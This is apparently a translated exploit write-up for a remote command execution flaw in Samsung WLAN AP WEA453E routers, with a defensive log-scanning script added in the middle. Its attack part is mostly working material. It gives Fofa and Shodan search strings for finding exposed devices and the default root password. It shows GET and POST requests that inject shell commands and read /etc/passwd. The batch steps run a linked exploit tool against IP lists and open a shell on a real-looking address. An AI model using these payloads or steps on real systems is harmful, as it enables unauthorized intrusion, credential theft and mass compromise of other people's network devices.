Samsung WLAN AP: RCE
1: Vulnerability information
Remote command execution in the Samsung WLAN AP WEA453E router…
2: Vulnerability reproduction
Fofa syntax:
title=="Samsung WLAN AP"
Shodan syntax:
title:"Samsung WLAN AP"
Default password:
username:root
password:sweap12~
Manual exploitation
Step 1: the following is the GET request PoC...
http://xx.xx.xx.xx/(download)/tmp/a.txt?command1=shell:ifconfig|%20dd%20of=/tmp/a.txt
Step 2: the following is the POST request PoC…
POST /(download)/tmp/a.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

command1=shell:ifconfig| dd of=/tmp/a.txt
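Step 3: read the /etc/passwd file to view the encrypted password of the root login user and decrypt it… the default password can also be used to log in…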
http://xx.xx.xx.xx/(download)/tmp/a.txt?command1=shell:cat /etc/passwd|%20dd%20of=/tmp/a.txt
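To find the requests from the manual steps above in web or proxy access logs, the following added example (not part of the original post or the linked project) flags log lines whose path is under /(download)/ and whose query carries command1=shell:. The log lines are constructed, and the function names, severity labels and combined log format are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Request portion of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines; the addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /(download)/tmp/a.txt'
    '?command1=shell:ifconfig|%20dd%20of=/tmp/a.txt HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] '
    '"POST /(download)/tmp/a.txt HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /%28download%29/tmp/'
    'a.txt?command1=shell%3Acat%20/etc/passwd HTTP/1.1" 200 900',
    '198.51.100.9 - - [01/Jan/2024:10:02:00 +0000] '
    '"GET /index.html HTTP/1.1" 200 1024',
]

def classify(method, target):
    """Return 'high', 'medium' or None for one request target."""
    path, _, query = target.partition("?")
    # Percent-decode so encoded variants of the path and marker still match.
    path, query = unquote(path).lower(), unquote(query).lower()
    if not path.startswith("/(download)/"):
        return None
    if "command1=shell:" in query:
        return "high"    # command string is visible in the query
    if method == "POST":
        return "medium"  # body is not logged, but a POST here is abnormal
    return None

def scan(lines):
    """Return (source, method, severity) for every suspicious log line."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        level = classify(m["method"], m["target"])
        if level:
            findings.append((m["src"], m["method"], level))
    return findings

if __name__ == "__main__":
    for src, method, level in scan(SAMPLE_LOG):
        print(f"{level:6} {method:4} from {src}")
```

Because access logs normally omit POST bodies, the POST variant can only be flagged by path; confirming it needs a proxy or packet capture that records the body.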
Batch exploitation
Step 1: project download address…
https://github.com/msfisgood/Samsung-WLAN_RCE
Step 2: run batch vulnerability detection…
python3 Check.py ip.txt
Step 3: obtain an interactive command interface against a single vulnerable target…
python3 "Samsung WLAN_RCE.py" 175.215.117.17